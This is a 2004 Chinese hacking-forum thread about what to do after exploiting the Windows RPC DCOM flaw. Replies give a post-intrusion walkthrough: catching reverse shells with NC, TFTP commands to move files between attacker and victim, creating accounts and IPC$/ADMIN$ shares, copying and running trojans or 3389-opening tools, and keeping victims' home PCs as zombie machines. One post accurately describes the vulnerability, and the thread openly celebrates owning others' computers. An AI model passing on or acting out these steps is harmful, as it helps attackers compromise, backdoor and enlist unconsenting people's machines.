|
作者: iwantfly [iwantfly] 论坛用户 | 登录 |
另外,入侵后,是在退出后copy还是不用退出就copy???用tftp怎样上传?? |
地主 发表时间: 04-07-10 00:17 |
回复: lhh2003 [lhh2003] 论坛用户 | 登录 |
晕,rpc溢出是反回一个shell,你copy? tftp用法,先把本机做ftp服务器,再tftp -i ip put 文件;tftp -i ip get 文件 |
B1层 发表时间: 04-07-10 00:21 |
回复: xsp68 [xsp68] 论坛用户 | 登录 |
什么是rpc啊!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
B2层 发表时间: 04-07-10 20:00 |
回复: lijingxi [lijingxi] 见习版主 | 登录 |
RPC入侵成功以后你会得到一个CMD SHELL(如果你用的溢出程序是需要telnet的!那么你就可以登陆到对方计算机,也有反向连接的!那么你需要用NC 等待连接!) 如果连接成功! 你可以用FTP或者TFTP上传文件! 如果你想COPY 就要在CMD SHELL下先建立一个用户名和密码! 然后查看对方有什么共享 是不是有IPC$ ADMIN$ 如果没有 就建立这些共享 如果有就在开一个CMD 然后和对方建立IPC 连接!然后COPY文件给他! 然后在你溢出成功的CMD下执行你COPY的文件! 如果你COPY的文件是开3389的 那么要等对方从新启动以后才能成连接!(如果对方是固定IP你就能连接成功!) 如果是木马那么你直接就可以连接了 到此 你入侵就算成功了! 自己多看基础资料!多学习!多实践!我相信你一定会成功!拥有自己的肉鸡! |
B3层 发表时间: 04-07-10 21:49 |
回复: xiaoaiziyi [xiaoaiziyi] 论坛用户 | 登录 |
哪里的机子,还有RPC漏洞?我好羡慕呢。 Remote Procedure Call (RPC)是Windows操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行的程序无缝地在远程系统上执行代码。Microsoft的RPC部分在通过TCP/IP处理信息交换时存在问题,远程攻击者可以利用这个漏洞以本地系统权限在系统上执行任意指令。 此漏洞是由于不正确处理畸形消息所致,漏洞影响使用RPC的DCOM接口。此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。攻击者成功利用此漏洞可以以本地系统权限执行任意指令。攻击者可以在系统上执行任意操作,如安装程序、查看或更改、删除数据或建立系统管理员权限的帐户。 |
B4层 发表时间: 04-07-10 21:52 |
回复: shengli [shengli] 论坛用户 | 登录 |
什么是rpc啊 |
B5层 发表时间: 04-07-14 19:33 |
回复: lijingxi [lijingxi] 见习版主 | 登录 |
自己去找资料! |
B6层 发表时间: 04-07-14 20:05 |
回复: daijian530 [daijian530] 论坛用户 | 登录 |
135端口! 一般是RPC之后开个telnet,因为退出RPC益处时对方有时会关机,最后在telnet的shall里面准备好shutdown -a.帮他一下嘛,呵呵~ 一般有RPC的个人机较多,动态IP嘛,就先用个反弹连接的木马将就一下,以"固定"其IP,再从长计议! |
B7层 发表时间: 04-07-14 20:24 |
回复: shengli [shengli] 论坛用户 | 登录 |
谢谢!!!!!! |
B8层 发表时间: 04-07-14 20:26 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号